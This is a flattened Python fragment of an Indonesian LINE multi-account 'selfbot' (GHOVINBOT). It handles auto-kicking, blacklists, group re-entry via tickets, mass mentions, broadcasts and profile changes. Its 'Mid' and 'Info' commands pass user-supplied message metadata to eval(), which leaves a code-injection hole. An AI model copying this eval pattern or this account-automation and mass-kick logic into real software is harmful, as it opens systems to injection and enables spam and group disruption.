cl.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = False
kc.kickoutFromGroup(op.param1,[op.param2])
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
pass
return
if Cmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.kickoutFromGroup(op.param1,[op.param2])
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
pass
return
            if any(a in op.param3 for a in admin):
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param1,admin)
cl.inviteIntoGroup(op.param1,admin)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param1,admin)
ki.inviteIntoGroup(op.param1,admin)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param1,admin)
kk.inviteIntoGroup(op.param1,admin)
except:
pass
return
            if any(s in op.param3 for s in staff):
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param1,staff)
ki.inviteIntoGroup(op.param1,staff)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param1,staff)
kk.inviteIntoGroup(op.param1,staff)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param1,staff)
kc.inviteIntoGroup(op.param1,staff)
except:
pass
return
if op.type == 55:
try:
if op.param1 in Setmain["ARreadPoint"]:
if op.param2 in Setmain["ARreadMember"][op.param1]:
pass
else:
Setmain["ARreadMember"][op.param1][op.param2] = True
else:
pass
except:
pass
            if cctv['cyduk'].get(op.param1) == True:
if op.param1 in cctv['point']:
Name = cl.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n~ " + Name
siderMembers(op.param1, [op.param2])
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(op.param1, image)
if op.type == 55:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
                    if 'MENTION' in msg.contentMetadata:
if wait["detectMention"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.sendMessage(msg.to, wait["Respontag"])
cl.sendMessage(msg.to, None, contentMetadata={"STKID":"7839705","STKPKGID":"1192862","STKVER":"1"}, contentType=7)
break
                    if 'MENTION' in msg.contentMetadata:
if wait["Mentionkick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.mentiontag(msg.to,[msg._from])
cl.sendMessage(msg.to, "Jangan tag saya....")
cl.kickoutFromGroup(msg.to, [msg._from])
break
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"「Cek ID Sticker」\n❧STKID : " + msg.contentMetadata["STKID"] + "\n❧STKPKGID : " + msg.contentMetadata["STKPKGID"] + "\n❧STKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"❧Nama : " + msg.contentMetadata["displayName"] + "\n❧MID : " + msg.contentMetadata["mid"] + "\n❧Status Msg : " + contact.statusMessage + "\n❧Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 2:
if msg.toType == 0:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"STKID : " + msg.contentMetadata["STKID"] + "\nSTKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nSTKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"❧Nama : " + msg.contentMetadata["displayName"] + "\n❧MID : " + msg.contentMetadata["mid"] + "\n❧Status Msg : " + contact.statusMessage + "\n°Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
#ADD Bots
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
cl.sendMessage(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
cl.sendMessage(msg.to,"Contact itu bukan anggota bot Dpk")
#ADD STAFF
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
cl.sendMessage(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
cl.sendMessage(msg.to,"Contact itu bukan staff")
#ADD ADMIN
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
cl.sendMessage(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
cl.sendMessage(msg.to,"Contact itu bukan admin")
#ADD BLACKLIST
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di blacklist")
#TALKBAN
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di Talkban")
#UPDATE FOTO
if msg.contentType == 1:
if msg._from in admin:
if Setmain["Addimage"] == True:
msgid = msg.id
fotoo = "https://obs.line-apps.com/talk/m/download.nhn?oid="+msgid
headers = cl.Talk.Headers
r = requests.get(fotoo, headers=headers, stream=True)
if r.status_code == 200:
path = os.path.join(os.path.dirname(__file__), 'dataPhotos/%s.jpg' % Setmain["Img"])
with open(path, 'wb') as fp:
shutil.copyfileobj(r.raw, fp)
cl.sendText(msg.to, "Berhasil menambahkan gambar")
Setmain["Img"] = {}
Setmain["Addimage"] = False
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
cl.updateGroupPicture(msg.to, path)
cl.sendMessage(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["ARfoto"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][mid]
cl.updateProfilePicture(path)
cl.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if Amid in Setmain["ARfoto"]:
path = ki.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Amid]
ki.updateProfilePicture(path)
ki.sendMessage(msg.to,"Foto berhasil dirubah")
elif Bmid in Setmain["ARfoto"]:
path = kk.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Bmid]
kk.updateProfilePicture(path)
kk.sendMessage(msg.to,"Foto berhasil dirubah")
elif Cmid in Setmain["ARfoto"]:
path = kc.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Cmid]
kc.updateProfilePicture(path)
kc.sendMessage(msg.to,"Foto berhasil dirubah")
elif Zmid in Setmain["ARfoto"]:
path = sw.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Zmid]
sw.updateProfilePicture(path)
sw.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path1 = ki.downloadObjectMsg(msg_id)
path2 = kk.downloadObjectMsg(msg_id)
path3 = kc.downloadObjectMsg(msg_id)
settings["changePicture"] = False
ki.updateProfilePicture(path1)
ki.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kk.updateProfilePicture(path2)
kk.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kc.updateProfilePicture(path3)
kc.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
cl.sendChatChecked(msg.to, msg_id)
ki.sendChatChecked(msg.to, msg_id)
kk.sendChatChecked(msg.to, msg_id)
kc.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
cmd = command(text)
if cmd == "help":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
cl.sendMessage(msg.to, str(helpMessage))
if cmd == "self on":
if msg._from in admin:
wait["selfbot"] = True
cl.sendText(msg.to, "Selfbot diaktifkan")
elif cmd == "self off":
if msg._from in admin:
wait["selfbot"] = False
cl.sendText(msg.to, "Selfbot dinonaktifkan")
elif cmd == "help2":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
cl.sendMessage(msg.to, str(helpMessage1))
elif cmd == "status":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = "★GHOVINBOT★\n"
if wait["sticker"] == True: md+="❧Sticker「ON」\n"
else: md+="❧Sticker「OFF」\n"
if wait["contact"] == True: md+="❧Contact「ON」\n"
else: md+="❧Contact「OFF」\n"
if wait["talkban"] == True: md+="❧Talkban「ON」\n"
else: md+="❧Talkban「OFF」\n"
if wait["Mentionkick"] == True: md+="❧Notag「ON」\n"
else: md+="❧Notag「OFF」\n"
if wait["detectMention"] == True: md+="❧Respon「ON」\n"
else: md+="❧Respon「OFF」\n"
if wait["autoJoin"] == True: md+="❧Autojoin「ON」\n"
else: md+="❧Autojoin「OFF」\n"
if wait["autoAdd"] == True: md+="❧Autoadd「ON」\n"
else: md+="❧Autoadd「OFF」\n"
if msg.to in welcome: md+="❧Welcome「ON」\n"
else: md+="❧Welcome「OFF」\n"
if wait["autoLeave"] == True: md+="❧Autoleave「ON」\n"
else: md+="❧Autoleave「OFF」\n"
if msg.to in protectqr: md+="❧Protecturl「ON」\n"
else: md+="❧Protecturl「OFF」\n"
if msg.to in protectjoin: md+="❧Protectjoin「ON」\n"
else: md+="❧Protectjoin「OFF」\n"
if msg.to in protectkick: md+="❧Protectkick「ON」\n"
else: md+="❧Protectkick「OFF」\n"
if msg.to in protectcancel: md+="❧Protectcancel「ON」\n"
else: md+="❧Protectcancel「OFF」\n"
if msg.to in protectantijs: md+="❧Antijs「ON」\n"
else: md+="❧Antijs「OFF」\n"
if msg.to in ghost: md+="❧Ghost「ON」\n"
else: md+="❧Ghost「OFF」\n"
cl.sendMessage(msg.to, md+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "creator" or text.lower() == 'creator':
if msg._from in admin:
cl.sendText(msg.to,"Creator Bot ♠GHOVINBOT♠")
ma = ""
for i in creator:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "about" or cmd == "informasi":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 Type Selfbot 」\n")
cl.sendMessage(msg.to, None, contentMetadata={'mid': mid}, contentType=13)
elif cmd == "me" or text.lower() == 'me':
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
elif text.lower() == "mid":
cl.sendMessage(msg.to, msg._from)
elif ("Mid " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Info " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "❧Nama : "+str(mi.displayName)+"\n❧Mid : " +key1+"\n❧Status Msg"+str(mi.statusMessage))
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(cl.getContact(key1)):
cl.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
else:
cl.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
elif cmd == "mybot":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Zmid}
cl.sendMessage1(msg)
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
except:
pass
elif text.lower() == "remove chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
cl.sendText(msg.to,"Chat dibersihkan...")
except:
pass
elif cmd.startswith("broadcast: "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
pesan = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
cl.sendMessage(group,"[ Broadcast ]\n" + str(pesan))
elif text.lower() == "mykey":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "「Mykey」\nSetkey bot mu「 " + str(Setmain["keyCommand"]) + " 」")
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
if key in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
cl.sendMessage(msg.to, "「Setkey」\nSetkey diganti jadi「{}」".format(str(key).lower()))
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
cl.sendMessage(msg.to, "「Setkey」\nSetkey mu kembali ke awal")
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "Tunggu sebentar...")
Setmain["restartPoint"] = msg.to
restartBot()
cl.sendMessage(msg.to, "Silahkan gunakan seperti semula...")
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = "Aktif " +waktu(eltime)
cl.sendMessage(msg.to,bot)
elif cmd == "ginfo":
if msg._from in admin:
try:
G = cl.getGroup(msg.to)
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
cl.sendMessage(msg.to, "♦GHOVINBOT♦ Grup Info\n\n❧Nama Group : {}".format(G.name)+ "\n❧ID Group : {}".format(G.id)+ "\n❧Pembuat : {}".format(G.creator.displayName)+ "\n❧Waktu Dibuat : {}".format(str(timeCreated))+ "\n❧Jumlah Member : {}".format(str(len(G.members)))+ "\n❧Jumlah Pending : {}".format(gPending)+ "\n❧Group Qr : {}".format(gQr)+ "\n❧Group Ticket : {}".format(gTicket))
cl.sendMessage(msg.to, None, contentMetadata={'mid': G.creator.mid}, contentType=13)
cl.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except Exception as e:
cl.sendMessage(msg.to, str(e))
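# "infogrup <n>" and "infomem <n>" take a 1-based index into getGroupIdsJoined(),
# matching the numbering printed by the gruplist command.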
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += "★GHOVINBOT★ Grup Info\n"
ret_ += "\n❧Nama Group : {}".format(G.name)
ret_ += "\n❧ID Group : {}".format(G.id)
ret_ += "\n❧Pembuat : {}".format(gCreator)
ret_ += "\n❧Waktu Dibuat : {}".format(str(timeCreated))
ret_ += "\n❧Jumlah Member : {}".format(str(len(G.members)))
ret_ += "\n❧Jumlah Pending : {}".format(gPending)
ret_ += "\n❧Group Qr : {}".format(gQr)
ret_ += "\n❧Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(to, str(ret_))
except:
pass
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "❧"+ str(no) + ". " + mem.displayName
cl.sendMessage(to,"❧Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\n「Total %i Members」" % len(G.members))
except:
pass
elif cmd.startswith("leave: "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
group = groups[int(number)-1]
ginfo = cl.getGroup(group)
ki.leaveGroup(group)
kk.leaveGroup(group)
kc.leaveGroup(group)
cl.sendMessage(msg.to,"Berhasil keluar di grup " +str(ginfo.name))
elif cmd == "fiendlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getAllContactIds()
for i in gid:
G = cl.getContact(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.displayName+ "\n"
cl.sendMessage(msg.to,"╔══[ FRIEND LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Friends ]")
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getGroupIdsJoined()
for i in gid:
G = cl.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
cl.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist1":
if msg._from in admin:
ma = ""
a = 0
gid = ki.getGroupIdsJoined()
for i in gid:
G = ki.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
ki.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist2":
if msg._from in admin:
ma = ""
a = 0
gid = kk.getGroupIdsJoined()
for i in gid:
G = kk.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kk.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist3":
if msg._from in admin:
ma = ""
a = 0
gid = kc.getGroupIdsJoined()
for i in gid:
G = kc.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kc.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = False
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Closed")
elif cmd == "url grup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to, "Nama : "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
#===========BOT UPDATE============#
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatebot":
if wait["selfbot"] == True:
if msg._from in admin:
settings["changePicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatefoto":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["ARfoto"][mid] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot1up":
if msg._from in admin:
Setmain["ARfoto"][Amid] = True
ki.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot2up":
if msg._from in admin:
Setmain["ARfoto"][Bmid] = True
kk.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot3up":
if msg._from in admin:
Setmain["ARfoto"][Cmid] = True
kc.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot4up":
if msg._from in admin:
Setmain["ARfoto"][Zmid] = True
sw.sendText(msg.to,"Kirim fotonya.....")
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot2name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot3name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("botkicker: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = sw.getProfile()
profile.displayName = string
sw.updateProfile(profile)
sw.sendMessage(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
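# "tagall" mentions every group member; mentions are sent in batches of 20 per
# message, apparently to stay under LINE's per-message mention limit (see the
# simplified batching loop below).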
elif cmd == "tagall" or text.lower() == "Nah":
if wait["selfbot"] == True:
if msg._from in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
jml = len(nama)
# Mention members in batches of 20; the original hard-coded ranges skipped the
# member at each batch boundary, skipped the last member, and ignored groups
# larger than 160 members.
for i in range(0, jml, 20):
mentionMembers(msg.to, nama[i:i+20])
elif cmd == "listbot":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
for m_id in Bots:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"♣GHOVIN Bot♣\n\n"+ma+"\nTotal「%s」 Bots" %(str(len(Bots))))
